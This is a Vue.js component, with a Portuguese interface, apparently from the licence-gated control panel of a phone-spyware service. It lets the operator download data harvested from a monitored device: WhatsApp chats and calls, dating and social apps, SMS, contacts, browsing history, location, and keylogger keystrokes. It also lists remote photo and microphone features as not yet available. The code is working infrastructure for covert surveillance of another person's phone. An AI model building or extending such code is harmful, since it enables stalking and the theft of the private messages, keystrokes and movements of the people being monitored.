<template>
  <div>
    <div class="mb-4 p-6 text-white bg-primary rounded" v-if="device.uid">
      <h4 class="text-white mb-2">{{ $t('Warning') }}</h4>
      <div>{{ $t('TxtDownload') }} <strong>{{ $t('TxtDownloadTwo') }}</strong>.</div>
      <div>{{ $t('TxtDownloadThree') }}</div>
    </div>

    <div class="vx-row" v-if="device.uid">
      <div class="vx-col mb-4 w-full lg:w-1/3" v-for="table in tablesMobile" :key="table.id">
        <button
          name="button"
          class="vs-component vs-button vs-button-success vs-button-relief w-full"
          @click="downloadRecords(device.uid, table)"
          :disabled="processing"
        >
          <span class="vs-button-text vs-button--text">
            <i class="fas fa-download"></i>
            {{ table.title }}
          </span>
          <span class="vs-button-linex" style="top: auto; bottom: -2px; left: 50%; transform: translate(-50%);"></span>
        </button>
      </div>
    </div>

    <div class="flex justify-center" v-if="device.uid">
      <router-link
        to="/dispositivo"
        name="button"
        class="vs-component vs-button vs-button-primary vs-button-relief mt-2"
      >
        <span class="vs-button-text vs-button--text">
          <i class="fas fa-arrow-circle-left"></i> {{ $t('Return') }}
        </span>
        <span
          class="vs-button-linex"
          style="top: auto; bottom: -2px; left: 50%; transform: translate(-50%)"
        ></span>
      </router-link>
    </div>
  </div>
</template>

<script>
export default {
  data() {
    return {
      device: {},
      processing: false,
      tablesMobile: [
        {
          id: 'whatsapp',
          title: 'WhatsApp Chat',
        },
        {
          id: 'whatsappaudio',
          title: 'WhatsApp Áudio',
          available: false,
        },
        {
          id: 'whatsappcall',
          title: 'WhatsApp Chamadas',
        },
        {
          id: 'instagram',
          title: 'Instagram',
        },
        {
          id: 'telegram',
          title: 'Telegram',
        },
        {
          id: 'tiktok',
          title: 'Tiktok',
          available: false,
        },
        {
          id: 'tinder',
          title: 'Tinder',
        },
        {
          id: 'kwai',
          title: 'Kwai',
        },
        {
          id: 'badoo',
          title: 'Badoo',
        },
        {
          id: 'snapchat',
          title: 'Snapchat',
        },
        {
          id: 'call',
          title: 'Chamadas',
        },
        {
          id: 'keylogger',
          title: 'Teclas',
        },
        {
          id: 'contact',
          title: 'Contatos',
        },
        {
          id: 'webhistory',
          title: 'Sites',
        },
        {
          id: 'websearch',
          title: 'Pesquisas',
        },
        {
          id: 'sms',
          title: 'SMS',
        },
        {
          id: 'location',
          title: 'Localização',
        },
        {
          id: 'remotephoto',
          title: 'Foto Remota',
          available: false,
        },
        {
          id: 'photogallery',
          title: 'Galeria',
          available: false,
        },
        {
          id: 'microphone',
          title: 'Microfone',
          available: false,
        },
      ],
    };
  },
  mounted() {
    const uid = this.$route.params.uid;
    this.$api
      .get(`/api/v1/mobile/device/${uid}`)
      .then(response => {
        this.device = response.data.data;
        if (!this.device.licence.active) {
          this.$vs.notify({
            time: 8000,
            title: 'Erro',
            text: 'Somente dispositivos com uma licença ativa podem ter os dados baixados.',
            iconPack: 'feather',
            icon: 'icon-alert-circle',
            color: 'danger',
          });

          this.$router.push('/dispositivo');
        }
      })
      .catch(() => {
        this.$router.push('/dispositivo');
      });
  },
  methods: {
    downloadRecords(uid, table) {
      if (table.available === false) {
        this.$vs.notify({
          time: 6000,
          title: 'Aviso',
          text: 'Download ainda não disponível para este tipo de dado.',
          iconPack: 'feather',
          icon: 'icon-alert-circle',
          color: 'warning',
        });
        return;
      }

      this.processing = true;
      const version = this.device.panel_version || 1;

      this.$api
        .get(`/api/v${version}/mobile/${table.id}/${uid}/download`)
        .then(response => {
          this.processing = false;

          if (response.data && response.data.taskId) {
            this.$vs.notify({
              time: 10000,
              text: 'Tarefa agendada. Um e-mail será enviado quando o download estiver pronto.',
              iconPack: 'feather',
              icon: 'icon-check',
              color: 'success',
            });
            return;
          }

          const url = typeof response.data === 'string' ? response.data : response.data.url || response.data;
          if (url) {
            window.location.href = url;
          } else {
            this.$vs.notify({
              time: 6000,
              text: 'Download solicitado com sucesso.',
              iconPack: 'feather',
              icon: 'icon-check',
              color: 'success',
            });
          }
        })
        .catch(error => {
          this.processing = false;

          this.$vs.notify({
            time: 6000,
            title: 'Aviso',
            text:
              (error.response && (error.response.data.error || error.response.data.message)) ||
              'Não foi possível solicitar o download.',
            iconPack: 'feather',
            icon: 'icon-alert-circle',
            color: 'danger',
          });
        });
    },
  },
};
</script>
